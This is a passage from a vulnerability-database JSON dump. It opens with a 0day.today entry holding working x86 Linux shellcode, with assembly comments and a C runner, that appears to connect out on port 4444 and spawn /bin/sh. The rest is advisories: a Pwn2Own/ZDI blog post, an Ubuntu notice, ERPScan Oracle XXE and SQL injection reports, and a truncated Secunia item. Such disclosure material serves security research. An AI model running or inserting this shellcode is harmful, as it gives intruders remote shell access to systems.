file descriptors to duplicate\r\n; -----\r\n; Registers before calling dup2: \r\n;\r\n; /---eax---\\ /---ebx----\\ /-------------ecx---------------\\\r\n; | 0x3f | | sockid | | file descriptor to dplicate |\r\n; \\---------/ \\----------/ | 2, 1 adnd 0 |\r\n; \\-------------------------------/\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n \r\nmov ebx, esi ; moving socketid from eax to ebx\r\n \r\n ; now we need a loop to run through for\r\n ; 0, 1 and 2\r\n \r\nxor ecx, ecx ; zeroing out ecx\r\nmov cl, 0x03 ; moving syscall for dup2\r\n \r\ndupin:\r\n xor eax, eax ; zeroing out eax\r\n mov al, 0x3f ; setting syscall value for dup2\r\n dec cl ; decreasing loop counter since we\r\n ; will need to deal with only 2, 1 and 0\r\n int 0x80 ; syscall triggering listen\r\n jnz dupin ; 
if the zero flag is not set then do it again\r\n \r\n; registers after calling socktcall\r\n; \r\n; since we don't care about any return values\r\n; we don't bother tracking register values\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; C version : int execve(const char *filename, char *const argv[], char *const envp[]);\r\n; ASM version: standard syscall using same format as above\r\n; ----- \r\n; Param Values: \r\n; filename // path of elf32 to execute\r\n;\r\n; argv // standard argv, first param is full path to elf32 null terminated\r\n;\r\n; envp // any environmental specific things, null in our case\r\n; -----\r\n; Registers before calling execve: \r\n;\r\n; /---eax---\\ /----------------ebx--------------------\\ /-------------ecx---------------\\\r\n; | 0x0B | | stack address if //bin/sh,0x00000000 | | stack address to 0x00000000 |\r\n; \\---------/ \\---------------------------------------/ \\-------------------------------/\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; call execve in order to complete the local bind shell\r\n; execve(\"/bin/sh\", argv[], envp[]);\r\n; argv needs to be Address of /bin/sh, 0x00000000\r\n; this is because when you call something from bash, etc\r\n; argv will contain the path of the executable within it\r\n \r\n; before starting we look like:\r\n; execve(NOT-SET-YET, NOT-SET-YET, NOT-SET-YET)\r\n \r\n; First we need to get 0x00000000 into ebx somehow\r\n; so lets zero out eax and push it to esp\r\n \r\nxor eax, eax ; zeroing out eax to make it 0x00000000\r\npush eax ; pushing 0x00000000 onto the stack (esp)\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; esp now looks like: 0x00000000;\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; pushing \"//bin/sh\" (8 bytes and reverses due to little endian)\r\npush 0x68732f6e ; hs/n : 2f68732f into esp\r\npush 0x69622f2f ; ib// : 6e69622f into esp\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n;esp now looks like: 
\"//bin/sh,0x00000000\";\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; since we have been pushing to the stack, we have been pushing to esp\r\n; now we need to get \"//bin/sh,0x00000000\" into ebx since it is the first parameter for execve\r\n; since esp contains exactly what we need we move it to ebx\r\n \r\nmov ebx, esp ; moving the param to ebx\r\n ; ebx now contains \"//bin/sh,0x00000000\"\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; now we look like: execve(\"//bin/sh,0x00000000\", NOT-SET-YET, NOT-SET-YET);\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; now we need to get 0x00000000 into edx\r\npush eax ; eax is still 0x00000000 so push it to esp\r\nmov edx, esp ; we need to move a 0x00000000 into \r\n ; the third parameter in edx\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; now we look like: execve(\"//bin/sh,0x00000000\", NOT-SET-YET, 0x00000000);\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; the second parameter is needs to be \"//bin/sh,0x00000000\"\r\n; which we can accomplish by moving ebx onto the stack\r\n; and then moving esp into ecx since it will be on the stack\r\n \r\npush ebx ; pushing \"//bin/sh,0x00000000\" back to the stack\r\nmov ecx, esp ; moving the address of ebx (on the stack) to ecx\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; now we look like: execve(\"//bin/sh,0x00000000\", *\"//bin/sh,0x00000000\", 0x00000000);\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; loading syscall execve\r\nmov al, 0x0B ; syscall for execve is 11 dec / 0x0B hex\r\nint 0x80\r\n \r\n*/\r\n \r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\n//compile with: gcc shellcode.c -o shellcode -fno-stack-protector -z execstack\r\n \r\nunsigned char code[] = 
\\\r\n\"\\x31\\xc0\\x50\\x6a\\x01\\x6a\\x02\\x89\\xe1\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x01\\xcd\\x80\\x96\\x31\\xd2\\x52\\xc6\\x04\\x24\\x0a\\xc6\\x44\\x24\\x02\\x07\\xc6\\x44\\x24\\x03\\x11\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe1\\x6a\\x10\\x51\\x56\\x89\\xe1\\x43\\x43\\x31\\xc0\\xb0\\x66\\xcd\\x80\\x89\\xf3\\x31\\xc9\\xb1\\x03\\x31\\xc0\\xb0\\x3f\\xfe\\xc9\\xcd\\x80\\x75\\xf6\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\r\n \r\nmain()\r\n{\r\n printf(\"Shellcode Length: %d\\n\", strlen(code));\r\n int (*ret)() = (int(*)())code;\r\n ret();\r\n}\n\n# 0day.today [2018-05-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30438"}], "trendmicroblog": [{"lastseen": "2018-03-09T14:52:04", "bulletinFamily": "blog", "cvelist": [], "description": "\n\nPwn2Own 2018 is coming up in a couple of weeks and I am excited to see what interesting vulnerabilities will pop up at the contest. I attempted to explain the contest to my mom, and in the simplest terms, I told her that Pwn2Own is a contest where contestants are rewarded for breaking something. It\u2019s not as basic as me beating up a printer with a baseball bat - which I have done, by the way, paying homage to the 1999 movie Office Space.\n\nIt\u2019s about breaking something, in this case, finding vulnerabilities in software, with the ultimate goal of making the software better.\n\nAttackers are always adapting their ways of exploiting vulnerabilities and the good guys out there are adapting with them to make sure they\u2019re not successful. At last year\u2019s event, we saw the first virtual machine escapes in contest history. For this year\u2019s contest, virtualization targets are on the list and we welcome VMWare as a sponsor. 
Microsoft isn\u2019t only a target in the enterprise application category, they have joined us as our partner in this year\u2019s contest.\n\nFor more information on the upcoming contest, complete rules, and how to enter the contest, visit <https://www.zerodayinitiative.com/blog/2018/1/25/pwn2own-returns-for-2018-partners-with-microsoft-and-sponsored-by-vmware>.\n\nRegistration for the contest participation closes at 5pm Pacific Time on March 5, 2018. For the latest updates, follow the Zero Day Initiative on Twitter at [@thezdi](<https://twitter.com/thezdi>).\n\n**Zero-Day Filters**\n\nThere are 21 new zero-day filters covering five vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. 
You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Adobe (13)_**\n\n| \n\n * 30436: ZDI-CAN-5455: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30437: ZDI-CAN-5456: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30438: ZDI-CAN-5457: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30440: ZDI-CAN-5463: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30441: ZDI-CAN-5464: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30442: ZDI-CAN-5465: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30443: ZDI-CAN-5466: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30446: ZDI-CAN-5467: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30447: ZDI-CAN-5468: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30448: ZDI-CAN-5469: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30449: ZDI-CAN-5470: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30451: ZDI-CAN-5474: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 30452: ZDI-CAN-5475: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC) \n---|--- \n| \n \n**_Foxit (2)_**\n\n| \n\n * 30450: ZDI-CAN-5471: Zero Day Initiative Vulnerability (Foxit Reader)\n * 30470: ZDI-CAN-5488: Zero Day Initiative Vulnerability (Foxit Reader) \n---|--- \n| \n \n**_OMRON (3)_**\n\n| \n\n * 30432: ZDI-CAN-5453: Zero Day Initiative Vulnerability (OMRON CX-One)\n * 30435: ZDI-CAN-5454: Zero Day Initiative Vulnerability (OMRON CX-One)\n * 30439: ZDI-CAN-5462: Zero Day Initiative Vulnerability (OMRON CX-One) \n---|--- \n| \n \n**_SAP (1)_**\n\n| \n\n * 30467: ZDI-CAN-5478: Zero Day Initiative Vulnerability (SAP MaxDB) \n---|--- \n| \n \n**_WECON (2)_**\n\n| \n\n * 30468: ZDI-CAN-5480: Zero Day Initiative Vulnerability (WECON LeviStudio)\n * 30469: ZDI-CAN-5481,5482: Zero Day Initiative 
Vulnerability (WECON LeviStudio) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-february-19-2018/>).\n\nThe post [TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of February 26, 2018](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-february-26-2018/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2018-03-02T16:22:09", "published": "2018-03-02T16:22:09", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-february-26-2018/", "id": "TRENDMICROBLOG:A715FAD0A825855D84E1660AAE1BFF8B", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of February 26, 2018", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. 
If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. 
VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. 
ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts on staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging Vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. 
ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi-award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user-friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. 
SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of the SQL extensions (afamexts.sql) does not filter user input values,\r\nwhich may lead to SQL injection. The only defense mechanism is the\r\npassword for APPS. If an attacker knows the password (for example, the\r\ndefault password APPS/APPS), he will be able to exploit the SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", 
"CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4851"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-030]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. 
VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime 